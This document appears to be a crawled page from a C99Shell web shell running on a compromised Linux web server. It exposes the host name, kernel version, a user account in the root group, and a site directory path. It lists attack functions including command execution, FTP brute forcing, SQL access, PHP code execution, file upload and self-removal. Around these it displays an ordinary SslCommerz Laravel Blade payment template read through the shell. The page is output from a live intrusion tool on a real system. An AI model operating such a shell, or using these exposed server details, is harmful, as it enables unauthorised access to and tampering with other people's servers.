!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/SslCommerz/Resources/views/   drwxr-xr-x
Free 23.03 GB of 117.98 GB (19.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     pay.blade.php (1.38 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('gateway::layouts.payment')

@section('logo', asset(config('sslcommerz.logo')))

@section('gateway', asset(config('sslcommerz.name')))

@section('content')
    <div class="straight-line"></div>
    @include('gateway::partial.instruction')
    <div class="container">
        <div class="d-flex justify-content-center">
            <div class="order-md-1 ">
                <form method="POST" class="needs-validation pay-form" id="payment-form" novalidate>
                    <button class="pay-button sub-btn" id="sslczPayBtn" token={{ __('if you have any token validation') }}
                        postdata={{ __('your javascript arrays or objects which requires in backend') }}
                        order={{ __('If you already have the transaction generated for current order') }}
                        endpoint="{{ route('gateway.complete', withOldQueryIntegrity(['gateway' => config('sslcommerz.alias')])) }}">
                        {{ __('Pay Now') }}
                    </button>
                </form>
            </div>
        </div>
    @endsection

    @section('js')
        <script>
            'use strict';
            var obj = {};
            var url = '{{ $data->sandbox }}' == 1 ? "sandbox" : "seamless-epay";
        </script>
        <script src="{{ asset('Modules/SslCommerz/Resources/assets/js/ssl.min.js') }}"></script>
    @endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--